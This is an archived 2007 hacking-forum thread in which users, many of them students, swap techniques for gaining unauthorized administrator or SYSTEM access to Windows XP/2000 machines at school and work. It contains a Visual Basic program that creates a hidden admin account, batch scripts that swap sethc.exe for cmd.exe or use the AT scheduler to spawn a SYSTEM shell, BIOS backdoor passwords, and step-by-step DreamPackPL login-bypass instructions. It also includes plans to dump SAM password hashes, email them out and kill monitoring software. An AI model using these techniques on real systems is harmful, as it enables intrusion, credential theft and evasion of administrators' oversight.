therealdonquixote Posted February 13, 2007 Share Posted February 13, 2007 You could always write some code into the msgina.dll, what the login is, with a hidden button that run CMD. That'd spawn in SYSTEM. Sweet idea. Got a file that we might be able to test?? Quote Link to comment Share on other sites More sharing options...
Arikirangi Posted February 14, 2007 Share Posted February 14, 2007 A bios chip cannot be backdoored or cracked on an oem machine. If it is a custom build machine then there are some backdoor passwords out there, but they rarely work. So that leaves you SOL. Thanks mate.. gave me an Idea. i went to http://www.uktsupport.co.uk/reference/biosp.htm and found a reasonable list of BD passwords for the award bios.. it seems my target has a cheap MB.. and AWARD_PW worked great.. I have full access now to boot CD / USB and can now go about the simple task of pilfering SAM BTW it was not a matter of the case being locked but as in most cases the Security camerers make it too "james bond" to open case without bad consequences. Quote Link to comment Share on other sites More sharing options...
Deveant Posted February 14, 2007 Share Posted February 14, 2007 haha thx for the lockpicking comic, that was pretty interesting, i think though im now gonna be sitting here with my old lockmaster lock tring to pick it all night :P Quote Link to comment Share on other sites More sharing options...
Arikirangi Posted February 14, 2007 Share Posted February 14, 2007 Oh .. and sorry for multiple posting.. it may be in my case a good idea insert some code into a file an admin would access on login, which would be able to copy the sam to a unsecure part of the OS /email to GMail, whenever the admin logs in so i dont have to keep accessing the PC via boot disk when the admin routinly changes PWD.. that would put me 1 step ahead. Also I believe the domain admin password is diff to the local PWD in terms of storage of HASH.. Is the domain PWD stored on the local machine in XP / 2k. how easy is the stored domain PWD to the local pwd in terms of HASH?. can these PWDS be broken with normal LM rainbow tables? Quote Link to comment Share on other sites More sharing options...
ShadowHax Posted February 18, 2007 Share Posted February 18, 2007 Heres a patch code that will add a new username + password, but will ask you for the creds, then it will delete the new admin from the user list, so that it is not visible from the fast-switch menu... Then it will open cmd prompt, not sure what good that will do. I have provided a compiled version of the VB code here: http://www.rrko.com/dev/AddUser.exe Module HakXP     Sub Main()         Console.Write("Enter new username: ")         Dim uName As String = Console.ReadLine()         Console.Write("Enter password for " + uName + " : ")         Dim pWord As String = Console.ReadLine()         AddUser(uName, pWord)         RunProcess("C:WINDOWSsystem32", "cmd.exe")  'Will open up a cmd prompt at C:WINDOWSsystem32     End Sub     Sub AddUser(ByVal UserName As String, ByVal Password As String)         Shell("net user " + UserName + " " + Password + " /add")    'Adds the user "UserName" with password "Password"         Shell("net localgroup administators " + UserName + " /add") 'Adds "UserName" to the admin group         Shell("net localgroup users " + UserName + " /delete")      'If Fast-Switching is on, then "UserName" will show up      End Sub     Sub RunProcess(ByVal Path As String, ByVal Exe As String)         Dim px As New Process         px.StartInfo.WorkingDirectory = Path         px.StartInfo.FileName = Exe         px.Start()     End Sub End Module Another possible approach... If you were to make a new windows process and create it under the SYSTEM account and set it to automatic, it would automaticly start at load, no matter who was logged in. This good be a possible way to retreive passwords? I'm working on it, have all the code, just need some filler code for the hack --ShadowHax Quote Link to comment Share on other sites More sharing options...
blackdeath42 Posted February 18, 2007 Share Posted February 18, 2007 Ok If you have Write access to the registry then this will work: •Open Regedit •Go to HKEY_USERS.DEFAULTControl PanelDesktop •Double click on SCRNSAVE.EXE •Change logon.scr to cmd.exe •Change ScreenSaveTimeOut Form 600 to 10 •Save and exit the editer and log out •After 10 seconds, the cmd prompt should appear and will have system privilages •Then do the net user hack •Your done you can do some pretty neat things with the SCRNSAVE.EXE variable e.g. minesweeper before you log on! :D Quote Link to comment Share on other sites More sharing options...
ShadowHax Posted February 18, 2007 Share Posted February 18, 2007 I have compiled a screen saver that will open a command prompt when executed You may have to open taskmgr to kill the scrn saver, cus I made it transparent Here is the link to the compiled screen saver http://rrko.com/dev/scrncmd.zip http://rrko.com/dev/AddUser.zip --ShadowHax Quote Link to comment Share on other sites More sharing options...
The Brain Posted February 26, 2007 Share Posted February 26, 2007 Does the replacement of either utilman.exe or services.exe need to be a 16-Bit-App? If not, are there any other restrictions to the file? Could i also simply rename a .bat-File to utilman.exe? I tried to replace it with Cmd.exe, it seems to be started after pressing [Win]+ but I can't see it?! :( And BTW: does it also have SYSTEM-Privilieges when started from the Start-Menu? Quote Link to comment Share on other sites More sharing options...
m0u53 Posted March 6, 2007 Share Posted March 6, 2007 copy explorer.exe from C:/WINNT/windows paste to a folder other than C:/WINNT/windows rename to explorer.scr right click>install goto display>screensaver>explorer.scr restart have fun also an idea would be to download pwdump and make a .bat file to dump the passes to the C:/ dir cuz thats what will popup so you can use the passowrd at that time and login to the admin and unlock your acount i have done this at my school countless times i went into the regiesty and set it to run every 1 seconds and well yea i have a 2 hour class so do the math :) XD -m0u53 Quote Link to comment Share on other sites More sharing options...
ShadowHax Posted March 8, 2007 Share Posted March 8, 2007 The only problem with this is that some "locations" (erm my school) have blocked not only replacing utilman / cmd / service / all other windows apps from being replaced, and they locked off the display settings. The one thing they did forget is Compmgmt.msc though =) Any suggestions on how i could bypass this? without booting a live distro or floppy? thx Quote Link to comment Share on other sites More sharing options...
azurith Posted March 23, 2007 Share Posted March 23, 2007 Module HakXP     Sub Main()         Console.Write("Enter new username: ")         Dim uName As String = Console.ReadLine()         Console.Write("Enter password for " + uName + " : ")         Dim pWord As String = Console.ReadLine()         AddUser(uName, pWord)         RunProcess("C:WINDOWSsystem32", "cmd.exe")  'Will open up a cmd prompt at C:WINDOWSsystem32     End Sub     Sub AddUser(ByVal UserName As String, ByVal Password As String)         Shell("net user " + UserName + " " + Password + " /add")    'Adds the user "UserName" with password "Password"         Shell("net localgroup administators " + UserName + " /add") 'Adds "UserName" to the admin group         Shell("net localgroup users " + UserName + " /delete")      'If Fast-Switching is on, then "UserName" will show up     End Sub     Sub RunProcess(ByVal Path As String, ByVal Exe As String)         Dim px As New Process         px.StartInfo.WorkingDirectory = Path         px.StartInfo.FileName = Exe         px.Start()     End Sub End Module This should make it work under either XP Home or Pro, and the install directory for XP shouldn't matter anymore.. Here's my update: Module HakXP     Sub Main()         Console.Write("Enter new username: ")         Dim uName As String = Console.ReadLine()         Console.Write("Enter password for " + uName + " : ")         Dim pWord As String = Console.ReadLine()         AddUser(uName, pWord)         RunProcess("%systemroot%system32", "cmd.exe")  'Will open up a cmd prompt at WINDOWSsystem32     End Sub     Sub AddUser(ByVal UserName As String, ByVal Password As String)         Shell("net user " + UserName + " " + Password + " /add")    'Adds the user "UserName" with password "Password"         Shell("net localgroup administators " + UserName + " /add") 'Adds "UserName" to the admin group         Shell("net localgroup users " + UserName + " /delete")      'If Fast-Switching is on, then "UserName" will show up     End Sub     Sub RunProcess(ByVal Path As String, ByVal Exe As String)         Dim px As New Process         px.StartInfo.WorkingDirectory = Path         px.StartInfo.FileName = Exe         px.Start()     End Sub End Module %systemroot% is the equivelent of typing C:Windows or D:Windows, or whatever drive you installed Windows.. It also doesn't require admin privs, most of the time. (I'm not sure if it can be disabled.) Anyways, I hope that helps somewhat. I think it may also work for Windows NT now also.. If I remember right, I think Windows NT root directory is 'C:WinNT' or something similar. So it should also work.. Could you recompile the code and test it with the new code? Thankies! ~~Azurith PS>> The updated code should make it compatible with NT & XP. The install drive of Windows should no longer matter. Quote Link to comment Share on other sites More sharing options...
The Brain Posted April 6, 2007 Share Posted April 6, 2007 Very interessting so far :D I'm working on a Solution tu put the CMD on the Loginscreen :twisted: But now that I have Admin-Privileges on the Local-Machine, I'd like to know how to gain those on the domain (like Arikirangi said). I don't have the possibility of creating a domain here at home, so if anyone has; Is pwdump (or any other tool like that) able, to read out the domain-passwords after you logged into the domain as a "normal"-user and start pwdump afterwards? I assume it'll only read out the local hashes but I think it's worth a try Quote Link to comment Share on other sites More sharing options...
m0u53 Posted April 11, 2007 Share Posted April 11, 2007 i know for sure if you can pull up command prompt you can edit files..right so what if one was to have xp/linux/98 on a cd and before a reboot change the boot.ini file to boot off of the cd or flash drive? also the autoexec.bat couldnt this be tampered with and dosent this run programs or commands before the xp gui screen? if so that could be tampered with as well i have a dell laptop issued by our school the 1st semester everyone used net user administrator * to change the admin password and gain "root" then near the end of the 1st semester EVERYONE had halo on thier laptops...this pissed off the admins greatly they took up everyones laptops and put Novell ZenWorks Desktop Management 7 on them and now if a program isnt launched though Novell then it terminates no mater what it is even import programs like updates are denied and then most recently they fux0r1ng took our entire taskbar...and there is only one way out of it Taskkill /IM <proccesname> [long story i know but its true sadly] <--brand new school this fast lil miracle is the only way anyone can run anything so what i would do is first create a Bat file @echo off tasklist >>Tasks.txt then looking through the tasks try and point out some key tasks like lets say you find "norton" or something(although i doubt ANY school admin would be retarded enough to run such a evil bl00dsux1ng program) best bet is to google it if it becomes obvous that this program isnt required kill it as soon as possable then create a bat file contaning @echo off TaskKill /IM nortan.exe if you keep adding to the file then you can make a nice lil bat file that will make you invisable or well sorta this is good for remote managemnt and other programs they use to moniter your activites and also when you kill these tasks be sure they are really "dead" by running tasklist again as some programs with fight you tooth and nail to the death or so to speak! Quote Link to comment Share on other sites More sharing options...
The Brain Posted April 17, 2007 Share Posted April 17, 2007 %systemroot%system32sethc.exe Replace it with cmd.exe Boot into Windows and press SHIFT five times. Command Prompt with SYSTEM privileges will pop-up (Not tested). --- Download DreamPackPL and replace %systemroot%System32sfcfiles.dll with the downloaded one (I'm not sure if it works with Windows XP, I only tested it in my W2K). --- Download WinlogonHijack and run it from a Service or anything else with SYSTEM-Privileges (I didn't test it yet, but the author claims it to work 100%). It'll log all passwords of logins to a file (But I don't know, if it catches network-pws (i.e. Domain-pws) too). --- --- Now I've got a question: kickarse posted a link to a nice paper about NT's login. Now, does anybody have a link to a similar paper about W2K, XP or maybe even Vista? Also I'd like to know if the password for domain-logins are saved anywehere (cached or just temporary in memory)? If so, it should be possible to save them anyhow . :twisted: L0phtcrack Crew wrote a Utility to catch these passwords in a NT-Network, it's called something like Blabla SMB ... maybe there's a new Version available? Let me know and thanks :D Quote Link to comment Share on other sites More sharing options...
GonZor Posted April 24, 2007 Share Posted April 24, 2007 This is a great idea, I ran into a couple of problems so I thought I would share my solutions. First of all I'd like to say that I am aware most people will not have access to the AT command, but for the few people that may be in a similar situation as me... My Situation: I DO NOT have Local Admin privileges but I do have higher privileges than standard users, I need access to a system cmd to bypass policy without drawing attention to myself from other students. I am unable to simply replace the file from windows and booting from another media is not possible. Ok anyone thats in a similar situation to me, heres my solution @ECHO off ECHO @ECHO off>%systemroot%sethc.bat ECHO REN %systemroot%system32sethc.exe sethc.bak>>%systemroot%sethc.bat ECHO COPY %systemroot%system32cmd.exe %systemroot%system32sethc.exe>>%systemroot%sethc.bat ECHO DEL %systemroot%sethc.bat /q SET /a nextmin=(%time:~3,2% + 1) SET newtime=%time:~0,3%%nextmin% AT %newtime% /interactive %systemroot%sethc.bat Fairly simple code.... VERY simple code... but if anyone wants an explanation let me know. I'm just too lazy to do it right now. NOTE - I purposely used cmd i am aware i could just create a Local Admin account but that is not what i need. EDIT - Just to clarify I could just use SET /a nextmin=(%time:~3,2% + 1) SET newtime=%time:~0,3%%nextmin% AT %newtime% /interactive cmd but I want to be able to close the cmd prompt easily and reopen it when necessary which is why I chose the longer version. If you would like the restore file here it is I forgot to post it because I don't have a need for it @ECHO off DEL %systemroot%system32sethc.exe REN %systemroot%system32sethc.bak sethc.exe Quote Link to comment Share on other sites More sharing options...
amish Posted May 13, 2007 Share Posted May 13, 2007 Well what I do is this. I made a mall bat file with this code. time 12:20:00 at 12:30 /INTERACTIVE cmd.exe /k NET TIME bournside4 /SET /YES time 12:29:58 Spawns an admin shell in 2 seconds, and becuase my school has a time server i can sync the time back :D But your school wont have one i dont think. So you will need to note the time and reset it manually with the "time" command. time 12:20:00 at 12:30 /INTERACTIVE cmd.exe /k dir time 12:29:58 The above code you can use and will work on anycomputer anywhere. Quote Link to comment Share on other sites More sharing options...
GonZor Posted May 14, 2007 Share Posted May 14, 2007 ...Spawns an admin shell in 2 seconds, and becuase my school has a time server i can sync the time back :D But your school wont have one i dont think. So you will need to note the time and reset it manually with the "time" command... Actually my school does sync the time bu I also use this in other locations, I did add a line of code to mine but didn't see the need to update my previous post... TIME = %newtime% Which will execute immediately, but your idea of changing the time back can be easily implemented if you add these three lines to the end of my code (excluding the line above) SET proptime=%time% TIME = %newtime% TIME = %proptime% In which case the %newtime% variable/calculation becomes redundant because the time will be change back anyway and only be a second out, but if that second is worthy to you you could correct it... Quote Link to comment Share on other sites More sharing options...
Anthrax Posted May 29, 2007 Share Posted May 29, 2007 i had an idea the other day. assuming you find a locked computer with admin rights. is it possible to put one of these executables on a flash drive so when you insert the flash drive it automatically runs the .exe? 1. not sure if you can launch a process while the computer is locked. 2. not sure on how the autorun feature will react. maybe someone would like to give this ago. Quote Link to comment Share on other sites More sharing options...
lord Posted June 4, 2007 Share Posted June 4, 2007 thought for the first day i may contribute . . . . . ACCESS ADMINISTRATORS ACCOUNT. 1. Get physical access to the machine. Remember that it must have a CD or DVD drive. 2. Download DreamPackPL from Official website or from Rapidshare OR CLICK ON THE LINK(Go here hxxp: www. d--b. webpark. pl/dreampackpl_en. htm). 3. Unzip the downloaded dreampackpl_iso. zip and you'll get dreampackpl. ISO. 4. Use any burning program that can burn ISO images. 5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files. 6. Press "R" to install DreamPackPL. 7. Press "C" to install DreamPackPL by using the recovery console. 8. Select the Windows installation that is currently on the computer (Normally is "1" if you only have one Windows installed) 9. Backup your original sfcfiles. dll by typing: "ren C:WindowsSystem32sfcfiles. dll sfcfiles. lld" (without quotes) 10. Copy the hacked file from CD to system32 folder. Type: "copy D:i386pinball. ex_ C:WindowsSystem32sfcfiles. dll" (without quotes and assuming your CD drive is D:) 11. Type "exit", take out disk and reboot. 12. In the password field, type "dreamon" (without quotes) and DreamPack menu will appear. 13. Click the top graphic on the DreamPack menu and you will get a menu popup. 14. Go to commands and enable the options and enable the god command. 15. Type "god" in the password field to get in Windows. You can also go to Passwords and select "Logon with wrong password and hash". This option allows you to login with ANY password Quote Link to comment Share on other sites More sharing options...
The Brain Posted June 8, 2007 Share Posted June 8, 2007 I mentioned it above 8-) But does this also work with network-login? Anyone tested so far? Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 8, 2007 Share Posted June 8, 2007 I mentioned it above 8-) But does this also work with network-login? Anyone tested so far? It all depends on the intelligence of the System Admin,If they are smart the passwords wont be cached but many System Admins are stupid and leave the passwords cached Quote Link to comment Share on other sites More sharing options...
XxSnipedYouxX Posted June 19, 2007 Share Posted June 19, 2007 Can't you do this easily by booting into safe mode, then opening control panel, going to user accounts, clicking on your account, then on change account type, and change to system administrator so you can bypass all this stuff. I don't know if it works on other systems, but it works on mine. Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 19, 2007 Share Posted June 19, 2007 Can't you do this easily by booting into safe mode, then opening control panel, going to user accounts, clicking on your account, then on change account type, and change to system administrator so you can bypass all this stuff. I don't know if it works on other systems, but it works on mine. Wouldn't that require already having the pass? ;) Quote Link to comment Share on other sites More sharing options...
XxSnipedYouxX Posted June 19, 2007 Share Posted June 19, 2007 I just tried it and it worked, but then again when I went to log on a just clicked on the administrator account and it wasn't password protected so and I couldn't try it on another account because all of them have admin access. You could always give it a try if you want to though. Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 19, 2007 Share Posted June 19, 2007 I just tried it and it worked, but then again when I went to log on a just clicked on the administrator account and it wasn't password protected so and I couldn't try it on another account because all of them have admin access. You could always give it a try if you want to though. I know it wont work, well at least not on any of my machines, all my accounts have passwords. This method relies on computers not having an admin password which everyone should have. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.